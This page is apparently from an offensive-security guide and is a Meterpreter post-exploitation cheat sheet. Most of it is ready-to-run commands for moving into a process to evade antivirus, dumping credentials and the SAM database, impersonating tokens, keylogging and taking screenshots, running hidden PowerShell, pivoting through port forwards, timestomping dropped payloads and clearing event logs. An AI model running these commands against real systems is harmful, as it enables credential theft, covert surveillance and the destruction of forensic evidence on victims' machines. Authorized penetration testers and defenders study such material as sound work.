Skip to main content

Meterpreter


Overview​

Meterpreter is the primary post-exploitation shell in MSF. It runs entirely in memory, communicates over the established C2 channel (not a new connection), and provides a rich command set for host interaction.

Once a session opens, interact with it:

msf6 > sessions
msf6 > sessions -i <ID>
meterpreter >

Core System Commands​

meterpreter > sysinfo              # OS, hostname, architecture, domain
meterpreter > getuid # Current user context
meterpreter > getpid # Current process ID
meterpreter > ps # List running processes (PID, name, user, path)
meterpreter > pwd # Print working directory
meterpreter > ls # List directory contents
meterpreter > cd <PATH> # Change directory
meterpreter > env # Print environment variables
meterpreter > getenv COMPUTERNAME # Single environment variable

Process Migration​

Migrating Meterpreter to another process moves the session out of your delivery process (which may be suspicious or short-lived) into a stable, legitimate one.

meterpreter > ps                              # Find target PID
meterpreter > migrate <PID> # Migrate to that process
meterpreter > migrate -N explorer.exe # Migrate by name (first match)
meterpreter > migrate -N svchost.exe # Common stable target
Migrate Immediately

Migrate as soon as a session opens - before doing anything else. Your delivery binary (e.g., a dropped .exe) may be killed by AV shortly after execution. Migrating moves you into a protected, pre-existing process.

Good Migration Targets​

ProcessNotes
explorer.exeUser desktop process - interactive, long-lived
svchost.exeSystem service host - extremely common, low suspicion
RuntimeBroker.exeWindows 10/11 system process
notepad.exeOnly if spawned by target user - short-lived risk

Avoid migrating into processes owned by SYSTEM if your current token is a standard user - the migrate will fail. Match privilege level.


File Operations​

meterpreter > upload /local/path/file.exe C:\\Temp\\file.exe
meterpreter > download C:\\Windows\\System32\\config\\SAM /tmp/SAM
meterpreter > download "C:\\Users\\Administrator\\Documents\\*.docx" /tmp/docs/

meterpreter > mkdir C:\\Temp\\newdir
meterpreter > rm C:\\Temp\\file.exe
meterpreter > mv C:\\Temp\\old.exe C:\\Temp\\new.exe
meterpreter > cat C:\\Windows\\System32\\drivers\\etc\\hosts
meterpreter > edit C:\\Temp\\file.txt # Opens vi on the remote file

Shell​

Drop to a native shell from Meterpreter. This opens a cmd.exe (Windows) or /bin/sh (Linux) in the current process context.

meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit # Returns to Meterpreter prompt
# PowerShell
meterpreter > execute -f powershell.exe -i -H # -i = interactive, -H = hidden window

Backgrounding and Returning​

meterpreter > background           # Return to msf6 prompt, session stays alive
# or
Ctrl+Z

msf6 > sessions -i <ID> # Return to session

Running Commands Non-Interactively​

meterpreter > execute -f cmd.exe -a "/c ipconfig /all" -H -o
# -H = hidden window, -o = capture output

Timestomping​

Modify file timestamps to match another file - reduces forensic footprint of dropped files.

meterpreter > timestomp C:\\Temp\\payload.exe -m "03/21/2024 10:00:00"   # Set modified time
meterpreter > timestomp C:\\Temp\\payload.exe -f C:\\Windows\\System32\\notepad.exe # Copy timestamps from notepad

Loading Extensions​

Meterpreter extensions load additional capability into the session.

meterpreter > load <extension_name>
meterpreter > help # Shows commands added by loaded extensions

Useful Extensions​

ExtensionLoad CommandProvides
kiwiload kiwiMimikatz-like credential extraction (requires SYSTEM)
incognitoload incognitoToken impersonation and manipulation
extapiload extapiExtended API (clipboard, window enumeration, service management)
privload privPrivilege escalation helpers
# Example: kiwi for credential extraction
meterpreter > load kiwi
meterpreter > creds_all # Dump all available credentials
meterpreter > lsa_dump_sam # SAM database
meterpreter > lsa_dump_secrets # LSA secrets

Token Manipulation (incognito)​

meterpreter > load incognito
meterpreter > list_tokens -u # List available tokens by user
meterpreter > impersonate_token "DOMAIN\\Admin" # Impersonate a token
meterpreter > getuid # Verify impersonation worked
meterpreter > rev2self # Drop back to original token

Screenshot / Keylogging​

# Screenshot
meterpreter > screenshot # Saves screenshot to local directory
meterpreter > screengrab # Same, newer command

# Keylogging
meterpreter > keyscan_start # Begin capturing keystrokes
meterpreter > keyscan_dump # Dump captured keystrokes
meterpreter > keyscan_stop # Stop keylogger

Port Forward (Quick Single-Port)​

Forward a port through the Meterpreter session to reach a service on the target or its network. (Full pivoting coverage in 06_pivoting.md.)

meterpreter > portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <REMOTE_HOST>
meterpreter > portfwd list
meterpreter > portfwd delete -l <LOCAL_PORT>
meterpreter > portfwd flush
# Example: Access RDP on internal host through session
meterpreter > portfwd add -l 13389 -p 3389 -r 10.10.10.50
# Then: xfreerdp /v:localhost:13389 /u:Administrator /d:DOMAIN

Sleep / Reduce Beacon Noise​

meterpreter > sleep 30        # Put session to sleep for 30 seconds (reduces noise)

For persistent low-and-slow operations, combine with a long SessionCommunicationTimeout on the handler side.


Session Cleanup​

meterpreter > clearev           # Clear Windows Event Logs (Application, System, Security)
meterpreter > rm C:\\Temp\\payload.exe
meterpreter > exit # Close the Meterpreter session
clearev

clearev clears all three Windows event logs entirely - this is itself a detectable indicator (Sysmon EID 104, Security EID 1102). Use it only if the mission explicitly calls for clearing logs. Partial log clearing is more suspicious than noisy logs.